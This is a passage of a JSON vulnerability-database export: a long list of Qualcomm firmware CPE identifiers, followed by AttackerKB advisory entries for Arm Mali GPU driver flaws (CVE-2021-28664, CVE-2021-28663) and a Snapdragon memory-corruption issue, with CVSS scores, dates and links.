"cpe:2.3:o:qualcomm:pm4125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd765g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln5040_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdxr2_5g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6150a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr845_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm8895_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6421_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe2550_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca9367_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6574a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdxr1_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qualcomm215_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5677_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5679_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150c_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3522_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3516_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa6145p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx50m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8801_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa8155_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:fsm10056_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3555_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmr735b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8916_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8064au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5577_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:ar8031_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5621_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6621_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smr525_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6390_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3610_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6391_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm8155au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe3340_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm4125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd662_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs410_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca9377_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm7250p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm8830_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd460_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca4020_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm8996au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm670l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsm8250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4309_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm4250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smr545_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9360_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd750g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca8337_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:apq8017_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8953_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa8150p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1360_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln5020_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6564a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm855au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsw8574_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5460_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5658_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmx50_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc410s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3988_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3620_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wgr7640_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6584au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8917_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln1030_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmx20_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6174_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc800s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa4340_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm6155au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb358s_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi632_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd6905g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3660b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmk8002_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm660_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:rgr7640au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8998_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6430_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1355_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd730_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd768g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcc1110_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5677_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmx24_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pme605_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5515_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8009_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr051_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:aqt1000_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe3100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb231_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:fsm10055_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr2965_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3980_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6574au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1357_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6375_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5620_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln1020_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd720g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmr735a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4305_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2301_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr675_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5522_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm2630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet6105_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa8155p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350c_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmr525_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8909w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm439_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa2150p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8675_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa2625_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1390_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7250b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa4361_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5641_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd429_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr865_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm7150a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm3301_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm215_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs605_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi8952_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3680b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5579_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd678_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8803_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca9379_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs405_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsm7250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfs2608_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3950_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wsa8815_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2307_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd675_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3550_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4302_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa515m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:csra6640_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sm6250p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtm527_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd845_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3519_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9206_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3999_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8802_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6850_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3991_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5620_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5679_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5461_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6320_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9330_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6851_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa5580_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm640p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdw3100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1354_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa6155_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdm429w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln5030_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6696_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd450_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd765_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcm4290_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet4101_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm640l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5652_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn3998_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd888_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1396_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wsa8830_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9326_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6436_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmw3100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2302_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6310_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9607_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sa6150p_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd205_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd710_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr735g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6150l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd835_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd665_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmk8003_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6426_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm8870_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd632_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2308_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm4650_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd870_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150b_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4301_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx20_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr6955_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm6325_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9626_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8673_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd8885g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm855_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8953_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa8686_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmd9607_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr3925_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm456_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8350bh_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4621_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr660g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wsa8835_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:ar8151_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1381_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtc800t_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfs2580_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm660a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150l_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6335_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4640_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd8655g_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9385_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1351_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6574_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe4303_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd455_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcd9375_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5670_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr4905_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1358_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdx55m_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr735_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat3514_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6595au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm8820_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcs603_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm3003a_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qln4640_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qca6564_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpa4360_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6125_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wtr2955_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qet4100_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:wcn6856_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmk8350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmi8998_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pmm8195au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm5870_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qsw6310_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm5621_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:mdm9628_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1350_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qtm525_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm6150_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qcm2290_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:msm8996au_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qbt1500_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:csra6620_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:pm8150_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd855_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr8250_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qat5533_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sda429w_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smb1398_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4630_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qfe2101_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sd439_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qpm4641_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:smr526_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:sdr052_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qdm2305_firmware:-:*:*:*:*:*:*:*", "cpe:2.3:o:qualcomm:qbt1000_firmware:-:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2023-06-02T05:22:05", "description": "The Arm Mali GPU kernel driver allows privilege escalation or a denial of service (memory corruption) because an unprivileged user can achieve read/write access to read-only pages. This affects Bifrost r0p0 through r29p0 before r30p0, Valhall r19p0 through r29p0 before r30p0, and Midgard r8p0 through r30p0 before r31p0.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-28664", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28664"], "modified": "2022-11-03T00:00:00", "id": "AKB:BA28E8DC-1A4B-454B-BA40-8D90DBEA1695", "href": "https://attackerkb.com/topics/rX1TQLjDCl/cve-2021-28664", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:41:12", "description": "The Arm Mali GPU kernel driver allows privilege escalation or information disclosure because GPU memory operations are mishandled, leading to a use-after-free. This affects Bifrost r0p0 through r28p0 before r29p0, Valhall r19p0 through r28p0 before r29p0, and Midgard r4p0 through r30p0.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-10T00:00:00", "type": "attackerkb", "title": "CVE-2021-28663", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28663"], "modified": "2021-06-16T00:00:00", "id": "AKB:D6B08A6F-BF93-44E7-BA9D-013105E53B81", "href": "https://attackerkb.com/topics/Rsq36ggh21/cve-2021-28663", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-07-17T11:25:52", "description": "Memory corruption due to improper check to return error when user application requests memory allocation of a huge size in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-09T00:00:00", "type": "attackerkb", "title": 